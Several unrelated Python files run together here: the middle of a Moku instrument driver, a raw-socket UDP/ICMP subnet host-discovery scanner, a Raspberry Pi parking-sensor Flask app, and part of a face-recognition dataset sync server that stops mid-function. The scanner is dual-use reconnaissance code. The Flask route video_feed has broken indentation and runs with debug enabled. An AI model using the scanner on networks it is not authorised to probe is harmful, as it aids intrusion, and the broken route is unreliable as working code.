        the *timeout* should be set appropriately.

        :type timeout: float
        :param timeout: Maximum time to wait for new data, or *None* for
            indefinite.

        :type wait: bool
        :param wait: If *true* (default), waits for a new waveform to be
            captured with the most recently-applied settings, otherwise just
            return the most recently captured valid data.

        :return: :any:`InstrumentData` subclass, specific to the instrument.
        """
        if self._moku is None:
            raise NotDeployedException()
        if self.check_uncommitted_state():
            raise UncommittedSettings("Detected uncommitted "
                                      "instrument settings.")
        # Stop existing logging sessions
        self._stream_stop()
        # Block waiting on state to propagate (if wait=True) or a trigger to
        # occur (wait=False). This also gives us acquisition parameters for
        # the buffer we will subsequently stream
        frame = self.get_realtime_data(timeout=timeout, wait=wait)
        # Wait on a synchronised frame or timeout, whichever comes first.
        # XXX: Timeout is not well-handled, in that each sub-operation has its
        # own timeout rather than the timeout applying to the whole function.
        # This works in most circumstances but can mean that the function's
        # maximum return time is several times longer than the user wanted.
        start = time.time()
        while not(frame.synchronised):
            if timeout is not None and (time.time() > start + timeout):
                raise FrameTimeout("Timed out waiting on instrument data.")
            frame = self.get_realtime_data(timeout=timeout, wait=wait)
        # Check if it is already paused
        was_paused = self._get_pause()
        # Force a pause so we can start streaming the buffer out
        if not was_paused:
            self._set_pause(True)
            if not _get_autocommit():
                self.commit()
        # Get buffer data using a network stream
        self._stream_start(start=0, duration=0, use_sd=False, ch1=True,
                           ch2=True, filetype='net')
        # Drain the stream until the instrument signals end-of-data.
        while True:
            try:
                self._stream_receive_samples(timeout)
            except NoDataException:
                break
        # Clean up data streaming threads
        self._stream_stop()
        # Set pause state to what it was before
        if not was_paused:
            self._set_pause(False)
            if not _get_autocommit():
                self.commit()
        channel_data = self._stream_get_processed_samples()
        self._stream_clear_processed_samples()
        # Take the channel buffer data and put it into an 'InstrumentData'
        # object
        if(getattr(self, '_frame_class', None)):
            buff = self._frame_class(**self._frame_kwargs)
            buff.ch1 = channel_data[0]
            buff.ch2 = channel_data[1]
            # Carry over identifiers from the realtime frame so the caller can
            # correlate this buffer with the instrument state that produced it.
            buff.waveformid = frame.waveformid
            buff._stateid = frame._stateid
            buff._trigstate = frame._trigstate
            # Finalise the buffer processing stage
            buff.process_buffer()
            return buff
        else:
            raise Exception("Unable to process instrument data.")

    @needs_commit
    def set_framerate(self, fr):
        """ Set framerate """
        self.framerate = fr

    def get_realtime_data(self, timeout=None, wait=True):
        """ Get downsampled data from the instrument with low latency.

        Returns a new :any:`InstrumentData` subclass (instrument-specific),
        containing a version of the data that may have been downsampled from
        the original in order to be transferred quickly.

        This function always returns a new object at `framerate`
        (10Hz by default), whether or not there is new data in that object.
        This can be verified by checking the return object's *waveformid*
        parameter, which increments each time a new waveform is captured
        internally.

        The downsampled, low-latency nature of this data makes it
        particularly suitable for plotting in real time. If you require
        high-accuracy, high-resolution data for analysis, see `get_data`.

        If the *wait* parameter is true (the default), this function will wait
        for any new settings to be applied before returning. That is, if you
        have set a new timebase (for example), calling this with *wait=True*
        will guarantee that the data returned has this new timebase.

        Note that if instrument configuration is changed, a trigger event must
        occur before data captured with that configuration set can become
        available. This can take an arbitrary amount of time. For this reason
        the *timeout* should be set appropriately.

        :type timeout: float
        :param timeout: Maximum time to wait for new data, or *None* for
            indefinite.

        :type wait: bool
        :param wait: If *true* (default), waits for a new waveform to be
            captured with the most recently-applied settings, otherwise just
            return the most recently captured valid data.

        :return: :any:`InstrumentData` subclass, specific to the instrument.
        """
        try:
            # Dodgy hack, infinite timeout gets translated in to just an
            # exceedingly long one
            endtime = time.time() + (timeout or sys.maxsize)
            while self._running:
                frame = self._queue.get(block=True, timeout=timeout)
                # Return only frames with a triggered and rendered state being
                # equal (so we can interpret the data correctly using the
                # entire state)
                # If wait is set, only frames that have the triggered state
                # equal to the currently committed state will be returned.
                if (not wait and frame._trigstate == frame._stateid) or \
                        (frame._trigstate == self._stateid):
                    return frame
                elif time.time() > endtime:
                    raise FrameTimeout()
                else:
                    log.debug("Incorrect state received: %d/%d",
                              frame._trigstate, self._stateid)
        except Empty:
            raise FrameTimeout()

    def _set_running(self, state):
        # Start/stop the frame worker thread on running-state transitions.
        prev_state = self._running
        super(FrameBasedInstrument, self)._set_running(state)
        if state and not prev_state:
            self._fr_worker = threading.Thread(target=self._frame_worker)
            self._fr_worker.start()
        elif not state and prev_state:
            self._fr_worker.join()

    def _make_frame_socket(self):
        # (Re)create the ZMQ SUB socket used to receive frame packets.
        if self.skt:
            self.skt.close()
        ctx = zmq.Context.instance()
        self.skt = ctx.socket(zmq.SUB)
        self.skt.connect("tcp://%s:27185" % self._moku._ip)
        self.skt.setsockopt_string(zmq.SUBSCRIBE, u'')
        # Keep at most 2 frames in flight; don't linger on close.
        self.skt.setsockopt(zmq.RCVHWM, 2)
        self.skt.setsockopt(zmq.LINGER, 0)

    def _frame_worker(self):
        # Background thread: reassemble frame packets into frame objects and
        # push completed frames on to the queue. Rebuilds the socket after a
        # quiet second with no data.
        connected = False
        if(getattr(self, '_frame_class', None)):
            self._make_frame_socket()
            fr = self._frame_class(**self._frame_kwargs)
            try:
                while self._running:
                    if self.skt in zmq.select([self.skt], [], [], 1.0)[0]:
                        connected = True
                        d = self.skt.recv()
                        fr.add_packet(d)
                        if fr._complete:
                            self._queue.put_nowait(fr)
                            fr = self._frame_class(**self._frame_kwargs)
                    else:
                        # No data for a second: assume the link dropped.
                        if connected:
                            connected = False
                            log.info("Frame socket reconnecting")
                        self._make_frame_socket()
            except Exception:
                log.exception("Closed Frame worker")
            finally:
                self.skt.close()
|
scanner.py | from bhp3_class.packets import IP, ICMP
import ipaddress
import socket
import sys
import threading
import time
SUBNET = '192.168.1.0/24'
MESSAGE = 'PYTHONRULES!'
def udp_sender():
    """Send a recognisable UDP datagram to every host in SUBNET.

    Closed ports answer with ICMP "port unreachable", which Scanner.sniff
    uses to infer that the host is up.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sender:
        payload = bytes(MESSAGE, 'utf8')
        for target in ipaddress.ip_network(SUBNET).hosts():
            sender.sendto(payload, (str(target), 65212))
class Scanner:
    # Listens on a raw ICMP socket for "destination unreachable / port
    # unreachable" replies provoked by udp_sender, and reports which hosts
    # on SUBNET are up. Requires root/administrator privileges.
    def __init__(self, host):
        self.host = host
        # Raw socket with IP_HDRINCL so we receive (and can parse) the full
        # IP header of every ICMP packet.
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
        self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
        self.socket.bind((host, 0))

    def sniff(self):
        # Our own address is always "up"; the trailing '*' marks it as local.
        hosts_up = [f'{str(self.host)} *']
        try:
            while True:
                raw_buffer = self.socket.recvfrom(65535)[0]
                # First 20 bytes are the IP header.
                ip_header = IP(raw_buffer[0:20])
                if ip_header.protocol == "ICMP":
                    # ICMP header starts after the (variable-length) IP header.
                    offset = ip_header.ihl * 4
                    buf = raw_buffer[offset:offset + 8]
                    icmp_header = ICMP(buf)
                    # type 3 / code 3 == destination unreachable, port unreachable
                    if icmp_header.code == 3 and icmp_header.type == 3:
                        if ipaddress.ip_address(ip_header.src_address) in ipaddress.IPv4Network(SUBNET):
                            # The reply echoes our probe payload; check it so
                            # we only count responses to *our* datagrams.
                            if raw_buffer[len(raw_buffer) - len(MESSAGE):] == bytes(MESSAGE, 'utf8'):
                                hosts_up.append(str(ip_header.src_address))
                                print(f'Host Up: {str(ip_header.src_address)}')
        # handle CTRL-C
        except KeyboardInterrupt:
            print('User interrupted.')
            if hosts_up:
                print(f'\n\nSummary: Hosts up on {SUBNET}')
                for host in sorted(hosts_up):
                    print(f'{host}')
            print('')
            sys.exit()
if __name__ == '__main__':
    # Target host comes from the command line, else a sensible default.
    host = sys.argv[1] if len(sys.argv) == 2 else '192.168.1.100'
    s = Scanner(host)
    # Give the sniffer a moment to bind before probing the subnet.
    time.sleep(1)
    t = threading.Thread(target=udp_sender)
    t.start()
    s.sniff()
SmartParkingAPI.py | # USAGE
# import the necessary packages
import cameraSensor
import carmotion
from imutils.video import VideoStream
from flask import Response
from flask import Flask
from flask import render_template
import time
import cv2
from livereload import Server
from gpiozero import MotionSensor
from gpiozero import LED
import time
import threading
import argparse
pir1=MotionSensor(17)# set the first motion sensor to pin 17
pir2=MotionSensor(27)# set the second motion sensor to pin 27
buzz=LED(4)# set the buzzer to pin 4 (driven via the LED interface)
# initialize a flask object
app = Flask(__name__)
time.sleep(2.0);  # camera warm-up before first frame is requested
lock = threading.Lock()  # guards frame access between camera thread and routes
vs = VideoStream(src=0).start()
motion= carmotion.CarSensor()
cam= cameraSensor.CarCamera(lock,vs)
message= "car not parked"  # default status; routes shadow this with a local
#this is the first route which returns both motion detection and offers camera surveilance
@app.route('/ParkingAPI',methods=['GET'])
def full_parking():
    """Route 1: motion-detection status page with camera surveillance."""
    status = motion.motion_detect(pir1, pir2, buzz)
    page = "sensorTrue.html" if status == "car parked" else "sensorFalse.html"
    return render_template(page)
#here is the second route which offers only motion detection to users
@app.route('/motionAPI',methods=['GET'])
def motion_parking():
    """Route 2: motion-detection status only (no camera)."""
    status = motion.motion_detect(pir1, pir2, buzz)
    page = "motionTrue.html" if status == "car parked" else "motionFalse.html"
    return render_template(page)
#here is the third option which just offers camera surveilance to users
@app.route('/cameraAPI',methods=['GET'])
def camera_parking():
    # Route 3: camera surveillance only; the page embeds /video_feed.
    return render_template("camera.html")
#this route generates the video stream as required
@app.route("/video_feed")
def video_feed():
# return the response generated along with the specific media
# type (mime type)
return Response(cam.generate(),mimetype = "multipart/x-mixed-replace; boundary=frame")
if __name__ == '__main__':
    # Start the camera frame-grabber as a daemon thread so it dies with the
    # main process.
    t = threading.Thread(target=cam.setup_frames,)  # initiates the threading for the camera
    t.daemon = True
    t.start()  # starts the thread
    ap = argparse.ArgumentParser()
    # gives users the ability to add arguments for different ports and for a
    # different IP address on their respective raspberry pi
    ap.add_argument("-i", "--ip", type=str, required=True,
        help="ip address of the device")
    ap.add_argument("-o", "--port", type=int, required=True,
        help="ephemeral port number of the server (1024 to 65535)")
    args = vars(ap.parse_args())
    # use_reloader=False keeps Flask from re-importing the module (which
    # would re-open the GPIO/camera resources).
    app.run(host=args["ip"], port=args["port"], debug=True,
        threaded=True, use_reloader=False)
    # release the video stream pointer (runs after the server shuts down)
    vs.stop()
|
upload_api-v2.py | # coding=utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os, json, time, sys, thread, base64
import argparse
import unicodedata
import shutil
import subprocess
import threading
# import dlib
import math
import time
import os.path
import Queue
from threading import Timer
import requests
from collections import defaultdict
from flask import Flask, request, url_for, make_response, abort, Response, jsonify, send_from_directory, redirect
from flask_sqlalchemy import SQLAlchemy
from migrate_db import People, TrainSet, db, AutoGroupSet, Stranger, Frame
from sqlalchemy import exc
#from flask_script import Server, Manager
#from flask_migrate import Migrate, MigrateCommand
#from werkzeug.utils import secure_filename
from uuid import uuid1
import urllib2
from urllib2 import Request, urlopen, URLError, HTTPError
from PIL import Image
#import tensorflow as tf
import numpy as np
from scipy import misc
from math import hypot
from multiprocessing import Process
from collections import OrderedDict
USE_DEFAULT_DATA=True # Enable to use "groupid_default" for SVM training
import facenet
#import clustering_people
from subprocess import Popen, PIPE
import FaceProcessing
from utilslib.mqttClient import MyMQTTClass
from utilslib.persistentUUID import getUUID
from utilslib.save2gst import save2gst, post2gst_motion, post2gst_video
from utilslib.save2gst import sendMessage2Group
from utilslib.getDeviceInfo import deviceId, get_current_groupid, get_deviceid, save_groupid_to_file, check_groupid_changed
from utilslib.qiniuUpload import qiniu_upload_img, qiniu_upload_video, qiniu_upload_data, SUFFIX
# from utilslib.make_a_gif import load_all_images, build_gif, url_to_image
# from utilslib.timer import Timer
from utilslib.clean_droped_data import clean_droped_embedding
from objects.generate_bottlenecks import resize
from faces import save_embedding
from utilslib.resultqueue import push_resultQueue, get_resultQueue
#deeepeye
from celery import Celery
from celery import Task
from billiard import current_process
from celery.signals import worker_process_init
from celery.signals import celeryd_after_setup
from celery.concurrency import asynpool
# --- Paths and storage ---------------------------------------------------
BASEDIR = os.getenv('RUNTIME_BASEDIR',os.path.abspath(os.path.dirname(__file__)))
TMP_DIR_PATH = os.path.join(BASEDIR, 'data', 'faces', 'tmp_pic_path')
UPLOAD_FOLDER = os.path.join(BASEDIR, 'image')
DATABASE = 'sqlite:///' + os.path.join(BASEDIR, 'data', 'data.sqlite')
face_tmp_objid = None
obje_tmp_objid = None
# --- Feature switches ----------------------------------------------------
EN_OBJECT_DETECTION = False
FACE_DETECTION_WITH_DLIB = False # Disable DLIB at this time
EN_SOFTMAX = False
SOFTMAX_ONLY = False
isUpdatingDataSet = False
webShowFace = False
ALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg', 'gif', 'bitmap'])
EXT_IMG='png'
# --- Flask / SQLAlchemy setup -------------------------------------------
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
app.config['SQLALCHEMY_DATABASE_URI'] = DATABASE
app.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True
# db = SQLAlchemy(app)
db.init_app(app)
ENABLE_DEBUG_LOG_TO_GROUP = False
DO_NOT_UPLOAD_IMAGE = False
DO_NOT_REPORT_TO_SERVER = False
NEAR_FRONTIAL_ONLY = False
# --- Face-detection / recognition tuning --------------------------------
image_size = 112
margin = 6
facenet_model = os.path.join(BASEDIR, 'facenet_models/20170512-110547/20170512-110547.pb')
minsize = 50 # minimum size of face
threshold = [0.6, 0.7, 0.7] # three steps's threshold
factor = 0.709 # scale factor
confident_value = 0.67
mineyedist = 0.3 # Eye distance of width of face bounding box
# Match-confidence threshold for display; only matches above this value are
# shown (applies to the database-traversal path).
CONFIDENT_VALUE_THRESHOLD = 0.80
FOR_ARLO = True
# BLURY_THREHOLD = 10 # Blur image if less than it. Reference: http://www.pyimagesearch.com/2015/09/07/blur-detection-with-opencv/
uploadImg=None
mqttc=None
gbottlenecks=None
trainfromfottlenecks=None
gFlask_port=None
preFrameOnDevice = {}
# Incremented for every recognised face; used to distinguish two unknown
# people that appear in the same picture.
all_face_index = 0
#deeepeye
asynpool.PROC_ALIVE_TIMEOUT = 60.0 #set this long enough
# --- Celery / Redis ------------------------------------------------------
CLUSTER_REDIS_ADDRESS = os.getenv('CLUSTER_REDIS_ADDRESS','redis')
CLUSTER_REDIS_PORT = os.getenv('CLUSTER_REDIS_PORT','6379')
deepeye = Celery('upload_api-v2',
    broker='redis://'+CLUSTER_REDIS_ADDRESS+':'+CLUSTER_REDIS_PORT+'/0',
    backend='redis://'+CLUSTER_REDIS_ADDRESS+':'+CLUSTER_REDIS_PORT+'/0')
deepeye.count = 1
# run as worker only
CLUSTER_WORKERONLY = os.getenv('CLUSTER_WORKERONLY', False)
HAS_OPENCL = os.getenv('HAS_OPENCL', 'true')
SAVE_ORIGINAL_FACE = False
original_face_img_path = os.path.join(BASEDIR, 'data', 'original_face_img')
if not os.path.exists(original_face_img_path):
    os.mkdir(original_face_img_path)
# --- SVM classifier options ---------------------------------------------
SVM_CLASSIFIER_ENABLED=True
SVM_SAVE_TEST_DATASET=True
SVM_TRAIN_WITHOUT_CATEGORY=True
SVM_HIGH_SCORE_WITH_DB_CHECK=True
counter = 0
# Without local OpenCL, embeddings are computed by a remote service.
if HAS_OPENCL == 'false':
    from embedding_client import get_remote_embedding
def featureCalculation(imgpath):
    """Compute and return the face-embedding vector for the image at *imgpath*."""
    img = misc.imread(os.path.expanduser(imgpath))
    # Dead code removed: `prewhitened = facenet.prewhiten(img)` was computed
    # but never used -- FaceProcessingImageData2 receives the raw image.
    # NOTE(review): if prewhitening was *intended* before embedding, pass the
    # prewhitened array instead -- confirm against FaceProcessing's contract.
    embedding = FaceProcessing.FaceProcessingImageData2(img)
    return embedding
def allowed_file(filename):
    """Return True if *filename* has a whitelisted image extension.

    The check is case-insensitive (fix: the whitelist is all lower-case, so
    the original comparison wrongly rejected e.g. ``photo.JPG``).

    :param filename: file name to validate
    :return: True when the extension is allowed
    """
    return '.' in filename and \
        filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
def insertOneImageIntoPeopleDB(filepath, uuid, group_id, objid, url, notFace=False, style="front"):
    # Compute the embedding for a local image file, persist it as a People
    # row, then delete the source file. Returns the embedding, or None when
    # the file is missing.
    if notFace is True:
        # Non-face samples are stored under a sentinel class id.
        classId = "notface"
    else:
        classId = objid
    if not os.path.exists(filepath):
        print("file not exists %s" %(filepath))
        return
    # NOTE(review): featureCalculation2 is defined elsewhere in this module
    # (not visible here); presumably the OpenCL-aware variant of
    # featureCalculation -- confirm.
    embedding = featureCalculation2(filepath)
    with app.app_context():
        people = People(embed=embedding, uuid=uuid, group_id=group_id,
                        objId=objid, aliyun_url=url, classId=classId, style=style)
        db.session.add(people)
        db.session.commit()
    # The image has been captured in the DB; drop the temp file.
    os.remove(filepath)
    return embedding
#For AutoGroup
#AutogroupFilesList = {}
#AutogroupDatasetFilesList = {}
# JSON-file-backed stores (MyDB), created lazily in disposeAutoGroupFunc.
AutogroupDB = None
AutogroupDatasetDB = None
# Control flags polled by the autogroup worker loop.
isSyncAutogroupDataset = True
isStartAutogroup = False
AUTOGROUP_UNKNOWNFACES_DB = os.path.join(BASEDIR, 'autogroup_unknownfaces_db.json')
AUTOGROUP_DATASET_DB = os.path.join(BASEDIR, 'autogroup_dataset_db.json')
class MyDB:
    """Minimal key/value store held in memory and optionally mirrored to a
    JSON file.

    With ``isSave=True`` every mutation is flushed to ``dbpath``; otherwise
    the caller is responsible for invoking :meth:`save`.
    """

    def __init__(self, dbpath, isSave=False):
        print("MyDB: __init__")
        self.isSave = isSave
        self.collection = {}
        # Seed from an existing JSON file when present.
        if os.path.isfile(dbpath):
            with open(dbpath) as fJson:
                self.collection = json.load(fJson)
        self.dbpath = dbpath

    def _maybe_save(self):
        # Flush to disk immediately when autosave was requested.
        if self.isSave is True:
            self.save()

    def fetch(self):
        """Return a shallow copy of the whole collection."""
        return self.collection.copy()

    def find(self, key, fields):
        """Return the record under *key*, or *fields* as the default."""
        return self.collection.get(key, fields)
        # Original (disabled) implementation matched sub-fields explicitly:
        # if key is None: return {}
        # if key in self.collection:
        #     if fields is None: return self.collection[key]
        #     subDic = self.collection[key]
        #     for subKey, subValue in fields:
        #         if subKey not in subDic or subValue != subDic[subKey]:
        #             return {}
        #     return subDic
        # return {}

    def insert(self, key, fields):
        self.collection[key] = fields
        self._maybe_save()

    def update(self, key, fields):
        self.collection.update({key: fields})
        self._maybe_save()

    def remove(self, key):
        # pop with a default so a missing key is a no-op, not a KeyError.
        self.collection.pop(key, "Key not Found!")
        self._maybe_save()

    def batch_insert(self, items):
        """Insert every dict-valued entry of *items*; skip anything else."""
        print("items={}".format(items))
        for key, value in items.items():
            if isinstance(value, dict):
                self.insert(key, value)
            else:
                print("batch_insert: invalid data format.")
        self._maybe_save()

    def save(self):
        """Serialise the collection to ``dbpath`` as JSON (no-op if unset)."""
        if self.dbpath is None:
            return
        with open(self.dbpath, 'w') as fJson:
            json.dump(self.collection, fJson)
def AutoGroupSetInsert(obj):
    # Placeholder/stub: insertion hook for AutoGroupSet, not yet implemented.
    print("test")
def AutoGroupSetUpdate(obj):
    # Placeholder/stub: update hook for AutoGroupSet, not yet implemented.
    print("test")
def AutoGroupSetRemove(obj):
    # Placeholder/stub: removal hook for AutoGroupSet, not yet implemented.
    print("test")
def disposeAutoGroupFunc(type, json=None):
    """Dispatch an autogroup control message.

    ``type`` selects the action ("dataset", "syncdataset" or "autogroup");
    ``json`` carries the payload for the insert actions.  (Both parameter
    names shadow a builtin/module but are kept for caller compatibility.)
    """
    global AutogroupDB, AutogroupDatasetDB
    global isSyncAutogroupDataset, isStartAutogroup
    print("disposeAutoGroupFunc: type={}, json={}".format(type, json))

    # Lazily open the JSON-backed stores on first use (MyDB instances are
    # always truthy, so `or` only triggers while they are still None).
    AutogroupDB = AutogroupDB or MyDB(AUTOGROUP_UNKNOWNFACES_DB)
    AutogroupDatasetDB = AutogroupDatasetDB or MyDB(AUTOGROUP_DATASET_DB)

    if type == "dataset":
        AutogroupDatasetDB.batch_insert(json)
        print("Download autogroup dataset...")
    elif type == "syncdataset":
        isSyncAutogroupDataset = True
        print("Set isSyncAutogroupDataset to True")
    elif type == "autogroup":
        if json is not None:
            AutogroupDB.batch_insert(json)
        isStartAutogroup = True
        print("Autogroup...")
#Path format: GroupID_FaceId/url_filename
def getFacialImagePath(img_path):
    """Reduce a full path to its ``GroupID_FaceId/url_filename`` suffix.

    I.e. keep only the immediate parent directory and the file name.
    """
    parent_dir, filename = os.path.split(img_path)
    return os.path.basename(parent_dir) + "/" + filename
def downloadAutogroupDataset(result, group_id):
    """Download the autogroup dataset images listed in *result* and register
    them (with embeddings) in the AutoGroupSet table.

    Only 'front'-style URLs are processed. Returns the list of persons whose
    download failed, so the caller can retry just those.
    """
    failedDownloadedItems = []
    for person in result:
        faceId = person.get("faceId")
        urls = person.get("urls")
        print('--> {}'.format(faceId))
        for url in urls:
            # url/faceid come from the Dianquan group album payload.
            img_url = url['url']
            style = url['style']
            if style != 'front':
                continue
            img_path = save_embedding.get_image_path_dst(img_url, group_id, faceId, style, "autogroup")
            embedding_path = save_embedding.get_embedding_path(img_path)
            embedding = None
            if not os.path.exists(img_path):
                img_path = save_embedding.download_img_for_svm_dst(img_url, group_id, faceId, style, "autogroup")
            if img_path:
                if not os.path.exists(embedding_path):
                    # Manually-cropped images need one more resize pass.
                    img = misc.imread(os.path.expanduser(img_path))
                    aligned = misc.imresize(img, (image_size, image_size), interp='bilinear')
                    misc.imsave(img_path, aligned)
                    embedding = featureCalculation(img_path)
                    embedding_path = save_embedding.get_embedding_path(img_path)
                    save_embedding.create_embedding_string(embedding, embedding_path)
                old_autogroup_set = AutoGroupSet.query.filter_by(url=img_url, group_id=group_id, is_or_isnot=True, style=style).first()
                if not old_autogroup_set:
                    if embedding is None:
                        # Embedding already existed on disk; load it back.
                        embedding_path = save_embedding.get_embedding_path(img_path)
                        embedding = save_embedding.read_embedding_string(embedding_path)
                        embedding = np.asarray(embedding)
                        print("read_embedding_string...........")
                    print("2, type(embedding)={}".format(type(embedding)))
                    # BUG FIX: this previously tested `unique_face_id in url`
                    # with unique_face_id == '', i.e. `'' in url`, which is
                    # always False -- the payload value was never read.
                    unique_face_id = url.get('unique_face_id', '')
                    autoGroupSet = AutoGroupSet(url=img_url, group_id=group_id, is_or_isnot=True,
                                                device_id='', face_id=faceId, unique_face_id=unique_face_id,
                                                style=style, filepath=img_path, embed=embedding)
                    db.session.add(autoGroupSet)
                    db.session.commit()
                    print('-> syncAutogroupDataset downloaded url {} to {}'.format(url['url'], img_path))
            else:
                # Remember the whole person record for a later retry.
                failedDownloadedItems.append(person)
    return failedDownloadedItems
def syncAutogroupDatasetFunc():
    # Pull the autogroup dataset for the current group from the API server,
    # download any missing images (with up to 3 retries), then delete local
    # rows/files that no longer exist on the server. Returns True on success.
    group_id = get_current_groupid()
    #host="http://localhost:3000/restapi/datasync/token/" + str(group_id)
    API_SERVER_ADDRESS = os.getenv('API_SERVER_ADDRESS','workaihost.tiegushi.com')
    API_SERVER_PORT = os.getenv('API_SERVER_PORT','80')
    host = 'http://'+API_SERVER_ADDRESS+':'+API_SERVER_PORT+'/restapi/datasync/token/' + str(group_id)
    result = None
    try:
        response = urlopen(host, timeout=10)
    except HTTPError as e:
        print('HTTPError: ', e.code)
        return False
    except URLError as e:
        print('URLError: ', e.reason)
        return False
    except Exception as e:
        print('Error: ', e)
        return False
    else:
        # everything is fine
        if 200 == response.getcode():
            result = response.readline()
            #print(result)
            result = json.loads(result)
            failedDownloadedItems = downloadAutogroupDataset(result, group_id)
            # Retry the failed downloads up to 3 times.
            try_count = 0
            while len(failedDownloadedItems) > 0:
                try_count = try_count+1
                print("len(failedDownloadedItems) = {}, try_count={}".format(len(failedDownloadedItems), try_count))
                if try_count > 3:
                    print("We have tried 3 times to download the autogroup dataset.")
                    break
                failedDownloadedItems = downloadAutogroupDataset(failedDownloadedItems, group_id)
            #Remove invalid data from local DB
            urlsInLocalDB = AutoGroupSet.query.filter_by(group_id=group_id, style="front").all()
            # Build the set of URLs the server still knows about.
            urlsOnServer = dict()
            for person in result:
                faceId = person.get("faceId")
                urls = person.get("urls")
                for url in urls:
                    img_url = url['url']
                    faceid = faceId
                    style = url['style']
                    urlsOnServer[img_url] = group_id, faceId, style
            print("len(urlsInLocalDB) = {}".format(len(urlsInLocalDB)))
            print("len(urlsOnServer) = {}".format(len(urlsOnServer)))
            #print("urlsOnServer = {}".format(urlsOnServer))
            # Anything local that the server no longer lists is stale: delete
            # the DB row, the image file, and its embedding file.
            if urlsInLocalDB:
                for item in urlsInLocalDB:
                    image_path = None
                    #print("item = {}, item.url={}".format(item, item.url))
                    if item.url not in urlsOnServer.keys():
                        print("{}, {}, {}, {} is not on server, delete it from local DB.".format(item.url, item.group_id, item.face_id, item.style))
                        if item.filepath:
                            image_path = item.filepath
                        db.session.delete(item)
                        db.session.commit()
                        if image_path and os.path.isfile(image_path):
                            print('Remove image from local {}'.format(image_path))
                            os.remove(image_path)
                            embedding_path = save_embedding.get_embedding_path(image_path)
                            if embedding_path and os.path.isfile(embedding_path):
                                print('Remove embedding from local {}:'.format(embedding_path))
                                os.remove(embedding_path)
            #Remove invalid photos from local
            '''
            dataset = []
            for path in paths.split(':'):
                path_exp = os.path.expanduser(path)
                classes = [path for path in os.listdir(path_exp) \
                                if os.path.isdir(os.path.join(path_exp, path))]
                classes.sort()
                nrof_classes = len(classes)
                for i in range(nrof_classes):
                    class_name = classes[i]
                    facedir = os.path.join(path_exp, class_name)
                    image_paths = []
                    if os.path.isdir(facedir):
                        images = os.listdir(facedir)
                        for img in images:
                            dataset.append(os.path.join(facedir,img))
            if len(dataset) > 0:
                for image_path in dataset:
                    l5 = (item for item in urlsInLocalDB if item.filepath == image_path)
                    if not l5:
                        print("image_path({}) only in local.".format(image_path))
                        if image_path and os.path.exists(image_path):
                            os.remove(filepath)
                        embedding_path = save_embedding.get_embedding_path(image_path)
                        if embedding_path and os.path.isfile(embedding_path):
                            os.remove(embedding_path)
            '''
            return True
        else:
            print('response code != 200')
            return False
# Sync training datasets between the server and the local database
def recover_db(img_url, group_id, faceid, filepath, embedding, style='front'):
    """Restore a face embedding and its training-set record into the local DB.

    Inserts a People row when none exists for (img_url, group_id), then
    inserts the matching TrainSet row, or refreshes its filepath when it
    already exists but points somewhere else.
    """
    device_uuid = get_deviceid()
    existing_person = People.query.filter_by(aliyun_url=img_url, group_id=group_id).first()
    if not existing_person:
        new_person = People(embed=embedding, uuid=device_uuid, group_id=group_id,
                            objId=faceid, aliyun_url=img_url, classId=faceid, style=style)
        db.session.add(new_person)
        db.session.commit()
        print("Add people")

    # One image URL maps to exactly one person, so a single-row lookup suffices.
    train_record = TrainSet.query.filter_by(url=img_url, group_id=group_id).first()
    if not train_record:
        db.session.add(TrainSet(url=img_url, group_id=group_id, is_or_isnot=True,
                                device_id='', face_id=faceid, filepath=filepath,
                                drop=False, style=style))
        db.session.commit()
    elif train_record.filepath != filepath:
        print("Update filepath in local DB")
        TrainSet.query.filter_by(url=img_url, group_id=group_id).update(dict(filepath=filepath))
        db.session.commit()
def check_image_valid(filepath):
    """Validate that *filepath* names an existing, non-empty file.

    Returns False (with a diagnostic print) for None, a missing path,
    or a zero-byte file; True otherwise.
    """
    if filepath is None:
        return False
    missing = not os.path.exists(filepath)
    if missing:
        print("not found {}".format(filepath))
        return False
    empty = os.path.getsize(filepath) < 1
    if empty:
        print("invalid file size {}".format(filepath))
        return False
    return True
def downloadTrainDatasets(result, group_id):
    """Download every training face image described by *result* and register it.

    result: parsed JSON from the datasync endpoint — a list of persons,
        each with a "faceId" and a list of "urls" ({'url': ..., 'style': ...}).
    group_id: the group the images belong to.

    For each image: download it if missing, create a denoised copy and an
    embedding file when needed, then record everything via recover_db().
    Returns the list of persons whose downloads failed so the caller can retry.
    """
    failedDownloadedItems = []
    img_path = None
    embedding_path = None
    try:
        for person in result:
            faceId = person.get("faceId")
            urls = person.get("urls")
            print('--> {}'.format(faceId))
            for url in urls:
                #print('  {}'.format(url))
                # url/faceid come from the group album on the server.
                # TODO: the album JSON could be parsed with a single loop.
                img_url = url['url']
                faceid = faceId
                style = url['style']
                if SVM_TRAIN_WITHOUT_CATEGORY is True:
                    style = 'front'
                else:
                    # Skip unusable poses; everything else is treated as 'front'.
                    if style == 'left_side' or style == 'right_side' or style == 'lower_head' or style == 'blury':
                        continue
                    else:
                        style = 'front'
                #status, embedding = down_img_embedding(img_url, group_id, faceid, style=style)
                print('img_url: ', img_url)
                img_path = save_embedding.get_image_path(img_url, group_id, faceId, style)
                print("img_path = {}".format(img_path))
                embedding_path = save_embedding.get_embedding_path(img_path)
                print("embedding_path = {}".format(embedding_path))
                denoise_path = save_embedding.get_image_denoise_path(img_path)
                recreate_embedding = False
                embedding = None
                if not os.path.exists(img_path):
                    print('img-path not exists ----- ')
                    img_path = save_embedding.download_img_for_svm(img_url, group_id, faceId, style)
                if img_path and check_image_valid(img_path):
                    if not os.path.exists(denoise_path):
                        img = misc.imread(os.path.expanduser(img_path))
                        save_embedding.save_image_denoise(img, denoise_path)
                        recreate_embedding = True
                    # A corrupt denoise file invalidates the embedding as well.
                    if os.path.exists(denoise_path) is True and check_image_valid(denoise_path) is False:
                        os.remove(embedding_path)
                        os.remove(denoise_path)
                        recreate_embedding = False
                        continue
                    if not os.path.exists(embedding_path) or recreate_embedding == True:
                        img = misc.imread(os.path.expanduser(denoise_path))  # manually cropped images must be rescaled again
